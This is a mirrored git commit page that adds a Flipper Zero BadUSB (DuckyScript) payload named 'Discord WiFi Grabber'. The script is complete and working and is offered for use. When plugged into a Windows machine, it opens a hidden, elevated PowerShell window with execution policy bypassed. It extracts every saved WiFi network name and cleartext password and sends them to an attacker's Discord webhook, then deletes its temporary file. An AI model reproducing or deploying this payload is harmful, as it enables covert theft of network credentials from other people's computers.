mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-28 21:53:21 -08:00
Add files via upload
This commit is contained in:
31
OSINT/Discord WiFi Grabber.txt
Normal file
31
OSINT/Discord WiFi Grabber.txt
Normal file
@@ -0,0 +1,31 @@
|
||||
|
||||
REM Title: Wifi Grabber to Discord
|
||||
REM Author: @beigeworm
|
||||
REM Description: Uses Powershell to gather Wifi info and send it via Discord.
|
||||
REM Target: Windows 10
|
||||
|
||||
REM *SETUP*
|
||||
REM replace YOUR_WEBHOOK_HERE with your discord webhook.
|
||||
|
||||
REM some setup for dukie script
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove -W Hidden to show the window)
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
ALT y
|
||||
DELAY 4000
|
||||
|
||||
STRING $whuri = "YOUR_WEBHOOK_HERE"
|
||||
STRING ; $outfile="";$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+";foreach($s in $ws){
|
||||
STRING ; if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "<None>" -And $s.length -gt 5){$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()}
|
||||
STRING ; $pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None";foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$outfile+="SSID: $ssid : Password: $pass`n"}}}$a++;}
|
||||
STRING ; $outfile | Out-File -FilePath "$env:temp\info.txt" -Encoding ASCII -Append; $Pathsys = "$env:temp\info.txt"; $msgsys = Get-Content -Path $Pathsys -Raw
|
||||
STRING ; $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')}
|
||||
STRING ; $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json
|
||||
STRING ; Start-Sleep 1; Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys; Remove-Item -Path $Pathsys -force;exit
|
||||
DELAY 500
|
||||
ENTER
|
||||
Reference in New Issue
Block a user